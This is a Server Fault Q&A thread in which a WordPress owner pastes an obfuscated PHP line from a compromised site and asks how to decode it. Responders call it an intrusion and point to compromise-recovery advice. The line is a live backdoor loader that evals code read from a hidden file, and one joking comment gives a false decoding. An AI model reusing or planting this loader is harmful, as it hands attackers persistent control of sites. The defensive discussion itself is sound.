-4

Possible Duplicate:
My server's been hacked EMERGENCY

I'm seeing the below junk code in one of my wordpress file.

@preg_replace("\x21\50\x2e\53\x29\41\x73\145","\x65\166\x61\154\x28\47\x24\150\x79\162\x3d\67\x35\61\x34\71\x3b\47\x2e\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x68\171\x72\75\x37\65\x31\64\x39\73","\x4c\63\x64\63\x64\171\x39\172\x61\130\x52\154\x63\171\x39\150\x59\155\x55\166\x4e\152\x42\154\x4c\63\x64\63\x64\171\x35\155\x59\130\x4e\60\x5a\130\x4a\156\x62\107\x39\151\x59\127\x77\165\x59\62\x39\164\x4c\63\x64\154\x59\151\x39\151\x62\107\x39\156\x4c\63\x64\167\x4c\127\x6c\165\x59\62\x78\61\x5a\107\x56\172\x4c\62\x70\172\x4c\62\x4e\150\x59\62\x68\154\x4c\171\x34\154\x4f\104\x49\64\x52\123\x55\167\x4d\104\x45\172\x4a\125\x49\64\x52\152\x4d\154\x51\153\x4d\170\x51\151\x56\103\x4d\152\x4a\103\x4a\124\x52\107\x4e\124\x63\75");

How do i decode this? I read in an article that we can decode this using python. Can python expert decode below and help me?

print (b"\x21\50\x2e\53\x29\41\x73\145") print (b"\x65\166\x61\154\x28\47\x24\150\x79\162\x3d\67\x35\61\x34\71\x3b\47\x2e\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x68\171\x72\75\x37\65\x31\64\x39\73","\x4c\63\x64\63\x64\171\x39\172\x61\130\x52\154\x63\171\x39\150\x59\155\x55\166\x4e\152\x42\154\x4c\63\x64\63\x64\171\x35\155\x59\130\x4e\60\x5a\130\x4a\156\x62\107\x39\151\x59\127\x77\165\x59\62\x39\164\x4c\63\x64\154\x59\151\x39\151\x62\107\x39\156\x4c\63\x64\167\x4c\127\x6c\165\x59\62\x78\61\x5a\107\x56\172\x4c\62\x70\172\x4c\62\x4e\150\x59\62\x68\154\x4c\171\x34\154\x4f\104\x49\64\x52\123\x55\167\x4d\104\x45\172\x4a\125\x49\64\x52\152\x4d\154\x51\153\x4d\170\x51\151\x56\103\x4d\152\x4a\103\x4a\124\x52\107\x4e\124\x63\75")

Thanks.

Kesav
  • 1
  • My secret decoder ring comes up with "Eat at Joe\'s". Anyone else get that? – gWaldo Aug 03 '12 at 13:27
  • 1
    No, I most definitely do not get that. The filename it's trying to evaluate includes the path element `www.fasterglobal.com`... – womble Aug 03 '12 at 13:28

1 Answers1

1

If you didn't put it there, get rid of it. Nobody writes legitimate code like that. You may have been hacked.

See How do I deal with a compromised server?

gWaldo
  • 11,887
  • 8
  • 41
  • 68
  • It only "may" have been hacked? It's pwned. Take off and nuke it from orbit. – womble Aug 03 '12 at 13:13
  • Decoded it reads "Eat at Joe\'s" – gWaldo Aug 03 '12 at 13:26
  • Thanks for your response. Does it provide any further information related to what script/files are being called and any path from where the script is being called so that i can trace the backdoor. – Kesav Aug 03 '12 at 19:17
  • This question addresses a similar issue, and the talk about the decoding: http://serverfault.com/q/249190/50875 – gWaldo Aug 03 '12 at 19:38